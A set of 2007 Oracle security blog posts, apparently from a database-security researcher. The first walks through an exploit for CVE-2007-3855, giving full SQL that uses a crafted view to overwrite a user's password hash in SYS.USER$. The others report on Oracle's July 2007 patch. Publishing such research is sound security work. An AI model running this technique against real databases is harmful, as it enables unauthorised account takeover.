22 Jul 2007 von Alexander Kornbrust.

Andrea Purificato has published an exploit for the Create-View-Problem (DB17 aka CVE-2007-3855, bug found by Red-Database-Security). This issue was fixed with the July 2007 CPU.

The exploit updates the password hash in SYS.USER$ via a specially crafted view. But the exploit from Andrea does not work without additional steps because it is not supported to modify password hashes via an update command.

Example:
– We calculate the password hashes for the user RDS and the passwords RDS and HACKED with the makepwd command.
c:\tools>makepwd.exe RDS RDS
B2ABF50FCECAE7CB

c:\tools>makepwd.exe RDS HACKED
7B843A192FF96BE9

– Now we connect to the database and update the password hash via a specially crafted view.

SQL> connect cpu/cpu
Connected.
SQL> create or replace view bunkerview as
2 select x.name,x.password from sys.user$ x left outer join sys.user$ y on
x.name=y.name;

View created.
SQL> update cpu.bunkerview set password=’7B843A192FF96BE9′ where name =’RDS’;

1 row updated.

SQL> commit;

Commit complete.

– The password is now changed to HACKED.

SQL> select password from sys.user$ where name=’RDS’;

PASSWORD
——————————
7B843A192FF96BE9

– But the connect attempt throws an error message…
SQL> connect rds/hacked
ERROR:
ORA-01017: invalid username/password; logon denied

Warning: You are no longer connected to ORACLE.

– To activate the password change it is necessary to restart the database.

C:\>sqlplus rds/hacked

SQL*Plus: Release 10.2.0.3.0 - Production on Sun Jul 22 18:24:41 2007

Copyright (c) 1982, 2006, Oracle. All Rights Reserved.

Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.3.0 - Production
With the Partitioning, OLAP and Data Mining Scoring Engine options

SQL>

Geschrieben in Exploit, CPUJul2007, Oracle Security | 5 Kommentare »

17 Jul 2007 von Alexander Kornbrust.

Eric Maurice from Oracle Global Security wrote in his blog that this CPU comes with a new concept called molecule.

“The napply CPU is an enhanced CPU format for Oracle Database Server for Unix and Linux platforms version 10.2.0.3 and onward (including 10.2.0.4 and 11g).  In a napply CPU, the security fixes are now grouped in what are called molecules.  Each molecule in the CPU is independent, and does not conflict with other molecules in the CPU.  Conflicts between molecules occur when fixes included respectively in each molecule affect the same file or group of files.”

“The new CPU format will greatly simplify the patch conflict resolution procedures, thus providing for a quicker resolution of security vulnerabilities than was previously the case.“

Geschrieben in CPUJul2007, Oracle Security | Keine Kommentare »

12 Jul 2007 von Alexander Kornbrust.

Oracle announced on their webpage that the upcoming CPU will fix 46 vulnerabilities. 20 vulnerabilites in the database (including 1 bug in APEX). The APEX vulnerability is already fixed in APEX 3.0.1.

The highest CVSS rating for the 4.8 which is quite high.

Our upcoming vulnerabilities are available on our website.

More details next tuesday.

Geschrieben in CPUJul2007, Oracle Security | 1 Kommentar »